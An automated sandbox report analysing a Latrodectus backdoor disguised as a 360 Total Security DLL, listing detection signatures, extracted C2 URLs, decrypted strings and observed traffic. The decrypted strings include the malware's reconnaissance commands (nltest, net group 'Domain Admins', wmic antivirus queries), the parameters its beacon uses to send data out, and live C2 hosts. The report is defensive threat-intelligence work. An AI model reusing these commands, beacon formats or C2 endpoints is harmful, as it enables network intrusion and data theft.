Windows Analysis Report
360total.dll.dll

Overview

General Information

Sample name: 360total.dll.dll
(renamed file extension from exe to dll)
Original sample name: 360total.dll.exe
Analysis ID: 1432373
MD5: bd3a3714ee9a071ebeb59ac91d9ebb5a
SHA1: 55110a221f20a4ceec34c58d0179fa31f8c102e9
SHA256: 4cf2b612939359977df51a32d2f63e2cb0c6c601e114b8e4812bd548d1db85fe
Tags: exe

Detection

Latrodectus
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
System process connects to network (likely due to code injection or exploit)
Yara detected Latrodectus
C2 URLs / IPs found in malware configuration
Contains functionality to compare user and computer (likely to detect sandboxes)
Contains functionality to detect sleep reduction / modifications
Deletes itself after installation
Performs a network lookup / discovery via net view
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses ipconfig to lookup or modify the Windows network settings
Uses net.exe to modify the status of services
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to query network adapater information
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates COM task schedule object (often to register a task for autostart)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check if the current machine is a sandbox (GetTickCount - Sleep)
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the current domain controller via net
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Suspicious Group And Account Reconnaissance Activity Using Net.EXE
Stores files to the Windows start menu directory
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection

Classification

Name: Unidentified 111 (Latrodectus), Latrodectus
Description: First discovered in October 2023, BLACKWIDOW is a backdoor written in C that communicates over HTTP using RC4 encrypted requests. The malware has the capability to execute discovery commands, query information about the victim's machine, update itself, as well as download and execute an EXE, DLL, or shellcode. The malware is believed to have been developed by LUNAR SPIDER, the creators of IcedID (aka BokBot) Malware.
Attribution: No Attribution
Blogpost URLs:
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_111

AV Detection

Source: 4.2.rundll32.exe.237c16b0000.1.raw.unpack Malware Configuration Extractor: Latrodectus {"C2 url": ["https://jarinamaers.shop/live/", "https://startmast.shop/live/"]}
Source: C:\Users\user\AppData\Roaming\Custom_update\Update_27361bf8.dll ReversingLabs: Detection: 18%
Source: 360total.dll.dll ReversingLabs: Detection: 18%
Source: 4.2.rundll32.exe.237c16b0000.1.raw.unpack String decryptor: /c ipconfig /all
Source: 4.2.rundll32.exe.237c16b0000.1.raw.unpack String decryptor: C:\Windows\System32\cmd.exe
Source: 4.2.rundll32.exe.237c16b0000.1.raw.unpack String decryptor: /c systeminfo
Source: 4.2.rundll32.exe.237c16b0000.1.raw.unpack String decryptor: C:\Windows\System32\cmd.exe
Source: 4.2.rundll32.exe.237c16b0000.1.raw.unpack String decryptor: /c nltest /domain_trusts
Source: 4.2.rundll32.exe.237c16b0000.1.raw.unpack String decryptor: C:\Windows\System32\cmd.exe
Source: 4.2.rundll32.exe.237c16b0000.1.raw.unpack String decryptor: /c net view /all /domain
Source: 4.2.rundll32.exe.237c16b0000.1.raw.unpack String decryptor: /c nltest /domain_trusts /all_trusts
Source: 4.2.rundll32.exe.237c16b0000.1.raw.unpack String decryptor: C:\Windows\System32\cmd.exe
Source: 4.2.rundll32.exe.237c16b0000.1.raw.unpack String decryptor: C:\Windows\System32\cmd.exe
Source: 4.2.rundll32.exe.237c16b0000.1.raw.unpack String decryptor: /c net view /all
Source: 4.2.rundll32.exe.237c16b0000.1.raw.unpack String decryptor: C:\Windows\System32\cmd.exe
Source: 4.2.rundll32.exe.237c16b0000.1.raw.unpack String decryptor: &ipconfig=
Source: 4.2.rundll32.exe.237c16b0000.1.raw.unpack String decryptor: /c net group "Domain Admins" /domain
Source: 4.2.rundll32.exe.237c16b0000.1.raw.unpack String decryptor: C:\Windows\System32\cmd.exe
Source: 4.2.rundll32.exe.237c16b0000.1.raw.unpack String decryptor: /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get * /Format:List
Source: 4.2.rundll32.exe.237c16b0000.1.raw.unpack String decryptor: C:\Windows\System32\wbem\wmic.exe
Source: 4.2.rundll32.exe.237c16b0000.1.raw.unpack String decryptor: /c net config workstation
Source: 4.2.rundll32.exe.237c16b0000.1.raw.unpack String decryptor: C:\Windows\System32\cmd.exe
Source: 4.2.rundll32.exe.237c16b0000.1.raw.unpack String decryptor: /c wmic.exe /node:localhost /namespace:\\root\SecurityCenter2 path AntiVirusProduct Get DisplayName | findstr /V /B /C:displayName || echo No Antivirus installed
Source: 4.2.rundll32.exe.237c16b0000.1.raw.unpack String decryptor: C:\Windows\System32\cmd.exe
Source: 4.2.rundll32.exe.237c16b0000.1.raw.unpack String decryptor: /c whoami /groups
Source: 4.2.rundll32.exe.237c16b0000.1.raw.unpack String decryptor: C:\Windows\System32\cmd.exe
Source: 4.2.rundll32.exe.237c16b0000.1.raw.unpack String decryptor: &systeminfo=
Source: 4.2.rundll32.exe.237c16b0000.1.raw.unpack String decryptor: &domain_trusts=
Source: 4.2.rundll32.exe.237c16b0000.1.raw.unpack String decryptor: &domain_trusts_all=
Source: 4.2.rundll32.exe.237c16b0000.1.raw.unpack String decryptor: &net_view_all_domain=
Source: 4.2.rundll32.exe.237c16b0000.1.raw.unpack String decryptor: &net_view_all=
Source: 4.2.rundll32.exe.237c16b0000.1.raw.unpack String decryptor: &net_group=
Source: 4.2.rundll32.exe.237c16b0000.1.raw.unpack String decryptor: &wmic=
Source: 4.2.rundll32.exe.237c16b0000.1.raw.unpack String decryptor: &net_config_ws=
Source: 4.2.rundll32.exe.237c16b0000.1.raw.unpack String decryptor: &net_wmic_av=
Source: 4.2.rundll32.exe.237c16b0000.1.raw.unpack String decryptor: &whoami_group=
Source: 4.2.rundll32.exe.237c16b0000.1.raw.unpack String decryptor: "pid":
Source: 4.2.rundll32.exe.237c16b0000.1.raw.unpack String decryptor: "%d",
Source: 4.2.rundll32.exe.237c16b0000.1.raw.unpack String decryptor: "proc":
Source: 4.2.rundll32.exe.237c16b0000.1.raw.unpack String decryptor: "%s",
Source: 4.2.rundll32.exe.237c16b0000.1.raw.unpack String decryptor: "subproc": [
Source: 4.2.rundll32.exe.237c16b0000.1.raw.unpack String decryptor: &proclist=[
Source: 4.2.rundll32.exe.237c16b0000.1.raw.unpack String decryptor: "pid":
Source: 4.2.rundll32.exe.237c16b0000.1.raw.unpack String decryptor: "%d",
Source: 4.2.rundll32.exe.237c16b0000.1.raw.unpack String decryptor: "proc":
Source: 4.2.rundll32.exe.237c16b0000.1.raw.unpack String decryptor: "%s",
Source: 4.2.rundll32.exe.237c16b0000.1.raw.unpack String decryptor: "subproc": [
Source: 4.2.rundll32.exe.237c16b0000.1.raw.unpack String decryptor: &desklinks=[
Source: 4.2.rundll32.exe.237c16b0000.1.raw.unpack String decryptor: *.*
Source: 4.2.rundll32.exe.237c16b0000.1.raw.unpack String decryptor: "%s"
Source: 4.2.rundll32.exe.237c16b0000.1.raw.unpack String decryptor: Update_%x
Source: 4.2.rundll32.exe.237c16b0000.1.raw.unpack String decryptor: Custom_update
Source: 4.2.rundll32.exe.237c16b0000.1.raw.unpack String decryptor: .dll
Source: 4.2.rundll32.exe.237c16b0000.1.raw.unpack String decryptor: .exe
Source: 4.2.rundll32.exe.237c16b0000.1.raw.unpack String decryptor: Updater
Source: 4.2.rundll32.exe.237c16b0000.1.raw.unpack String decryptor: "%s"
Source: 4.2.rundll32.exe.237c16b0000.1.raw.unpack String decryptor: rundll32.exe
Source: 4.2.rundll32.exe.237c16b0000.1.raw.unpack String decryptor: "%s", %s %s
Source: 4.2.rundll32.exe.237c16b0000.1.raw.unpack String decryptor: runnung
Source: 4.2.rundll32.exe.237c16b0000.1.raw.unpack String decryptor: :wtfbbq
Source: 4.2.rundll32.exe.237c16b0000.1.raw.unpack String decryptor: %s%s
Source: 4.2.rundll32.exe.237c16b0000.1.raw.unpack String decryptor: files/bp.dat
Source: 4.2.rundll32.exe.237c16b0000.1.raw.unpack String decryptor: %s\%d.dll
Source: 4.2.rundll32.exe.237c16b0000.1.raw.unpack String decryptor: %d.dat
Source: 4.2.rundll32.exe.237c16b0000.1.raw.unpack String decryptor: %s\%s
Source: 4.2.rundll32.exe.237c16b0000.1.raw.unpack String decryptor: init -zzzz="%s\%s"
Source: 4.2.rundll32.exe.237c16b0000.1.raw.unpack String decryptor: front
Source: 4.2.rundll32.exe.237c16b0000.1.raw.unpack String decryptor: /files/
Source: 4.2.rundll32.exe.237c16b0000.1.raw.unpack String decryptor: Facial
Source: 4.2.rundll32.exe.237c16b0000.1.raw.unpack String decryptor: !"$%&()*wp
Source: 4.2.rundll32.exe.237c16b0000.1.raw.unpack String decryptor: .exe
Source: 4.2.rundll32.exe.237c16b0000.1.raw.unpack String decryptor: Content-Type: application/x-www-form-urlencoded
Source: 4.2.rundll32.exe.237c16b0000.1.raw.unpack String decryptor: POST
Source: 4.2.rundll32.exe.237c16b0000.1.raw.unpack String decryptor: GET
Source: 4.2.rundll32.exe.237c16b0000.1.raw.unpack String decryptor: curl/7.88.1
Source: 4.2.rundll32.exe.237c16b0000.1.raw.unpack String decryptor: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
Source: 4.2.rundll32.exe.237c16b0000.1.raw.unpack String decryptor: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
Source: 4.2.rundll32.exe.237c16b0000.1.raw.unpack String decryptor: pN
Source: 4.2.rundll32.exe.237c16b0000.1.raw.unpack String decryptor: URLS
Source: 4.2.rundll32.exe.237c16b0000.1.raw.unpack String decryptor: COMMAND
Source: 4.2.rundll32.exe.237c16b0000.1.raw.unpack String decryptor: ERROR
Source: 4.2.rundll32.exe.237c16b0000.1.raw.unpack String decryptor: eNIHaXC815vAqddR21qsuD35eJFL7CnSOLI9vUBdcb5RPcS0h6
Source: 4.2.rundll32.exe.237c16b0000.1.raw.unpack String decryptor: counter=%d&type=%d&guid=%s&os=%d&arch=%d&username=%s&group=%lu&ver=%d.%d&up=%d&direction=%s
Source: 4.2.rundll32.exe.237c16b0000.1.raw.unpack String decryptor: counter=%d&type=%d&guid=%s&os=%d&arch=%d&username=%s&group=%lu&ver=%d.%d&up=%d&direction=%s
Source: 4.2.rundll32.exe.237c16b0000.1.raw.unpack String decryptor: counter=%d&type=%d&guid=%s&os=%d&arch=%d&username=%s&group=%lu&ver=%d.%d&up=%d&direction=%s
Source: 4.2.rundll32.exe.237c16b0000.1.raw.unpack String decryptor: C:\WINDOWS\SYSTEM32\rundll32.exe %s,%s
Source: 4.2.rundll32.exe.237c16b0000.1.raw.unpack String decryptor: C:\WINDOWS\SYSTEM32\rundll32.exe %s
Source: 4.2.rundll32.exe.237c16b0000.1.raw.unpack String decryptor: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
Source: 4.2.rundll32.exe.237c16b0000.1.raw.unpack String decryptor: <html>
Source: 4.2.rundll32.exe.237c16b0000.1.raw.unpack String decryptor: <!DOCTYPE
Source: 4.2.rundll32.exe.237c16b0000.1.raw.unpack String decryptor: %s%d.dll
Source: 4.2.rundll32.exe.237c16b0000.1.raw.unpack String decryptor: 12345
Source: 4.2.rundll32.exe.237c16b0000.1.raw.unpack String decryptor: &stiller=
Source: 4.2.rundll32.exe.237c16b0000.1.raw.unpack String decryptor: %s%d.exe
Source: 4.2.rundll32.exe.237c16b0000.1.raw.unpack String decryptor: LogonTrigger
Source: 4.2.rundll32.exe.237c16b0000.1.raw.unpack String decryptor: %x%x
Source: 4.2.rundll32.exe.237c16b0000.1.raw.unpack String decryptor: TimeTrigger
Source: 4.2.rundll32.exe.237c16b0000.1.raw.unpack String decryptor: PT0H%02dM
Source: 4.2.rundll32.exe.237c16b0000.1.raw.unpack String decryptor: %04d-%02d-%02dT%02d:%02d:%02d
Source: 4.2.rundll32.exe.237c16b0000.1.raw.unpack String decryptor: &mac=
Source: 4.2.rundll32.exe.237c16b0000.1.raw.unpack String decryptor: %02x
Source: 4.2.rundll32.exe.237c16b0000.1.raw.unpack String decryptor: :%02x
Source: 4.2.rundll32.exe.237c16b0000.1.raw.unpack String decryptor: PT0S
Source: 4.2.rundll32.exe.237c16b0000.1.raw.unpack String decryptor: &computername=%s
Source: 4.2.rundll32.exe.237c16b0000.1.raw.unpack String decryptor: &domain=%s
Source: 4.2.rundll32.exe.237c16b0000.1.raw.unpack String decryptor: ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/
Source: 4.2.rundll32.exe.237c16b0000.1.raw.unpack String decryptor: \*.dll
Source: 4.2.rundll32.exe.237c16b0000.1.raw.unpack String decryptor: %04X%04X%04X%04X%08X%04X
Source: 4.2.rundll32.exe.237c16b0000.1.raw.unpack String decryptor: %04X%04X%04X%04X%08X%04X
Source: 4.2.rundll32.exe.237c16b0000.1.raw.unpack String decryptor: \Registry\Machine\
Source: 4.2.rundll32.exe.237c16b0000.1.raw.unpack String decryptor: https://jarinamaers.shop/live/
Source: 4.2.rundll32.exe.237c16b0000.1.raw.unpack String decryptor: https://startmast.shop/live/
Source: 4.2.rundll32.exe.237c16b0000.1.raw.unpack String decryptor: AppData
Source: 4.2.rundll32.exe.237c16b0000.1.raw.unpack String decryptor: Desktop
Source: 4.2.rundll32.exe.237c16b0000.1.raw.unpack String decryptor: Startup
Source: 4.2.rundll32.exe.237c16b0000.1.raw.unpack String decryptor: Personal
Source: 4.2.rundll32.exe.237c16b0000.1.raw.unpack String decryptor: Local AppData
Source: 4.2.rundll32.exe.237c16b0000.1.raw.unpack String decryptor: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
Source: 4.2.rundll32.exe.237c16b0000.1.raw.unpack String decryptor: \update_data.dat
Source: 4.2.rundll32.exe.237c16b0000.1.raw.unpack String decryptor: pN
Source: 4.2.rundll32.exe.237c16b0000.1.raw.unpack String decryptor: URLS|%d|%s
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_000000018003BC0C CryptAcquireContextW,GetLastError,CryptAcquireContextW,CryptGenRandom,CryptReleaseContext, 3_2_000000018003BC0C
Source: C:\Windows\System32\rundll32.exe Code function: 8_3_000001E3B57E5E5C CryptUnprotectData,RtlDeleteBoundaryDescriptor, 8_3_000001E3B57E5E5C
Source: unknown HTTPS traffic detected: 23.1.237.91:443 -> 192.168.2.5:49735 version: TLS 1.0
Source: unknown HTTPS traffic detected: 40.126.28.23:443 -> 192.168.2.5:49704 version: TLS 1.2
Source: unknown HTTPS traffic detected: 40.126.28.23:443 -> 192.168.2.5:49707 version: TLS 1.2
Source: unknown HTTPS traffic detected: 23.46.214.6:443 -> 192.168.2.5:49727 version: TLS 1.2
Source: unknown HTTPS traffic detected: 23.46.214.6:443 -> 192.168.2.5:49728 version: TLS 1.2
Source: unknown HTTPS traffic detected: 40.126.28.23:443 -> 192.168.2.5:49730 version: TLS 1.2
Source: unknown HTTPS traffic detected: 52.165.165.26:443 -> 192.168.2.5:49734 version: TLS 1.2
Source: unknown HTTPS traffic detected: 52.165.165.26:443 -> 192.168.2.5:49740 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.46.75:443 -> 192.168.2.5:49745 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.219.28:443 -> 192.168.2.5:49750 version: TLS 1.2
Source: unknown HTTPS traffic detected: 20.42.73.28:443 -> 192.168.2.5:49779 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.84.207:443 -> 192.168.2.5:49781 version: TLS 1.2
Source: Binary string: C:\vmagent_new\bin\joblist\574019\out\Release\360Util64.pdb source: rundll32.exe, 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmp, rundll32.exe, 00000004.00000003.2007308735.00000237C3230000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.2008448685.0000000180086000.00000002.00000001.01000000.00000000.sdmp, 360total.dll.dll, Update_27361bf8.dll.4.dr

Spreading

Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\net.exe net view /all /domain
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\net.exe net view /all
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\net.exe net view /all /domain
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\net.exe net view /all
Source: C:\Windows\System32\rundll32.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Windows\System32\rundll32.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
Source: C:\Windows\System32\rundll32.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\Windows\System32\rundll32.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
Source: C:\Windows\System32\rundll32.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
Source: C:\Windows\System32\rundll32.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Windows\System32\rundll32.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
Source: C:\Windows\System32\rundll32.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\Windows\System32\rundll32.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
Source: C:\Windows\System32\rundll32.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
Source: C:\Windows\System32\rundll32.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32
Source: C:\Windows\System32\rundll32.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer
Source: C:\Windows\System32\rundll32.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Windows\System32\rundll32.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Elevation
Source: C:\Windows\System32\rundll32.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Windows\System32\rundll32.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
Source: C:\Windows\System32\rundll32.exe Code function: 4_2_00000237C16CA350 FindFirstFileW,FindNextFileW,LoadLibraryW, 4_2_00000237C16CA350
Source: C:\Windows\System32\rundll32.exe Code function: 4_2_00000237C16C1A08 FindFirstFileA,wsprintfA,FindNextFileA,FindClose, 4_2_00000237C16C1A08
Source: C:\Windows\System32\rundll32.exe Code function: 8_3_000001E3B57E16F4 FindFirstFileW,FindNextFileW, 8_3_000001E3B57E16F4
Source: C:\Windows\System32\rundll32.exe Code function: 8_3_000001E3B57E6604 FindFirstFileA,FindNextFileA, 8_3_000001E3B57E6604
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\Microsoft\Windows\INetCookies\PrivacIE\
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\Microsoft\Windows\INetCookies\PrivacIE\Low\
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\INetCookies\
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\INetCache\

Networking

Source: C:\Windows\System32\rundll32.exe Network Connect: 104.21.46.75 443
Source: C:\Windows\System32\rundll32.exe Network Connect: 172.67.219.28 443
Source: C:\Windows\System32\rundll32.exe Network Connect: 104.21.84.207 443
Source: Malware configuration extractor URLs: https://jarinamaers.shop/live/
Source: Malware configuration extractor URLs: https://startmast.shop/live/
Source: global traffic HTTP traffic detected: POST /OneCollector/1.0/ HTTP/1.1
    Accept: */*
    APIKey: cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521
    AuthMsaDeviceTicket: t=GwAWAbuEBAAU2qcZHJoKGNizGOeyqM4OaIoSZ0MOZgAAENhIsZk1icdmK4NNtUk6KLPgAMvy17Udgd1MlHE7GXRAxu9wDd84HaOk1nGIMKru6radFnZDfu7zWhcmz9j72MdI/lM5JykN5JyMCsrKKjhnWsxMrSmUTHFAm4lCtsR/4kXJ5OVGBubVm1qKlLaqfTPe4/QIS6EsPZhp2A+GbXPmd9v7KWe0y9ZBVkGnVgT2XAL69MHD65Z2sZ/bvdyK2Z9GRgl5dhajOwb9unLzQz2LihgZzhVMiIEIlP0Ox0qtNEB072yB6rGFSpbQMfXp3Qm9wrLMHPG0cNIMKQ3+lgA3sY/VTGnPGJVnsHSsfW8D9dyBIAE=&p=
    Client-Id: NO_AUTH
    Content-Encoding: deflate
    Content-Type: application/bond-compact-binary
    Expect: 100-continue
    SDK-Version: EVT-Windows-C++-No-3.4.15.1
    Upload-Time: 1714166397033
    Host: self.events.data.microsoft.com
    Content-Length: 7972
    Connection: Keep-Alive
    Cache-Control: no-cache
Source: Joe Sandbox View IP Address: 239.255.255.250 239.255.255.250
Source: Joe Sandbox View ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox View ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox View ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox View JA3 fingerprint: 1138de370e523e824bbca92d049a3777
Source: Joe Sandbox View JA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4
Source: Joe Sandbox View JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: Joe Sandbox View JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: unknown HTTPS traffic detected: 23.1.237.91:443 -> 192.168.2.5:49735 version: TLS 1.0
Source: unknown TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown TCP traffic detected without corresponding DNS query: 40.126.28.23
Source: unknown TCP traffic detected without corresponding DNS query: 40.126.28.23
Source: unknown TCP traffic detected without corresponding DNS query: 40.126.28.23
Source: unknown TCP traffic detected without corresponding DNS query: 40.126.28.23
Source: unknown TCP traffic detected without corresponding DNS query: 40.126.28.23
Source: unknown TCP traffic detected without corresponding DNS query: 40.126.28.23
Source: unknown TCP traffic detected without corresponding DNS query: 40.126.28.23
Source: unknown TCP traffic detected without corresponding DNS query: 40.126.28.23
Source: unknown TCP traffic detected without corresponding DNS query: 40.126.28.23
Source: unknown TCP traffic detected without corresponding DNS query: 40.126.28.23
Source: unknown TCP traffic detected without corresponding DNS query: 40.126.28.23
Source: unknown TCP traffic detected without corresponding DNS query: 40.126.28.23
Source: unknown TCP traffic detected without corresponding DNS query: 40.126.28.23
Source: unknown TCP traffic detected without corresponding DNS query: 40.126.28.23
Source: unknown TCP traffic detected without corresponding DNS query: 40.126.28.23
Source: unknown TCP traffic detected without corresponding DNS query: 40.126.28.23
Source: unknown TCP traffic detected without corresponding DNS query: 40.126.28.23
Source: unknown TCP traffic detected without corresponding DNS query: 40.126.28.23
Source: unknown TCP traffic detected without corresponding DNS query: 40.126.28.23
Source: unknown TCP traffic detected without corresponding DNS query: 40.126.28.23
Source: unknown TCP traffic detected without corresponding DNS query: 40.126.28.23
Source: unknown TCP traffic detected without corresponding DNS query: 40.126.28.23
Source: unknown TCP traffic detected without corresponding DNS query: 40.126.28.23
Source: unknown TCP traffic detected without corresponding DNS query: 40.126.28.23
Source: unknown TCP traffic detected without corresponding DNS query: 40.126.28.23
Source: unknown TCP traffic detected without corresponding DNS query: 40.126.28.23
Source: unknown TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown TCP traffic detected without corresponding DNS query: 40.126.28.23
Source: unknown TCP traffic detected without corresponding DNS query: 40.126.28.23
Source: unknown TCP traffic detected without corresponding DNS query: 40.126.28.23
Source: unknown TCP traffic detected without corresponding DNS query: 40.126.28.23
Source: unknown TCP traffic detected without corresponding DNS query: 40.126.28.23
Source: unknown TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown TCP traffic detected without corresponding DNS query: 40.126.28.23
Source: unknown TCP traffic detected without corresponding DNS query: 40.126.28.23
Source: unknown TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown TCP traffic detected without corresponding DNS query: 40.126.28.23
Source: unknown TCP traffic detected without corresponding DNS query: 40.126.28.23
Source: unknown TCP traffic detected without corresponding DNS query: 40.126.28.23
Source: unknown TCP traffic detected without corresponding DNS query: 40.126.28.23
Source: unknown TCP traffic detected without corresponding DNS query: 40.126.28.23
Source: unknown TCP traffic detected without corresponding DNS query: 40.126.28.23
Source: unknown TCP traffic detected without corresponding DNS query: 40.126.28.23
Source: unknown TCP traffic detected without corresponding DNS query: 40.126.28.23
Source: unknown TCP traffic detected without corresponding DNS query: 40.126.28.23
Source: unknown TCP traffic detected without corresponding DNS query: 40.126.28.23
Source: C:\Windows\System32\rundll32.exe Code function: 4_2_00000237C16C8D90 InternetOpenW,InternetOpenUrlW,InternetReadFile,InternetCloseHandle,InternetCloseHandle, 4_2_00000237C16C8D90
Source: global traffic HTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1
    Host: www.google.com
    Connection: keep-alive
    X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIkqHLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc=
    Sec-Fetch-Site: none
    Sec-Fetch-Mode: no-cors
    Sec-Fetch-Dest: empty
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
    Accept-Encoding: gzip, deflate, br
    Accept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /async/ddljson?async=ntp:2 HTTP/1.1
    Host: www.google.com
    Connection: keep-alive
    Sec-Fetch-Site: none
    Sec-Fetch-Mode: no-cors
    Sec-Fetch-Dest: empty
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
    Accept-Encoding: gzip, deflate, br
    Accept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1
    Host: www.google.com
    Connection: keep-alive
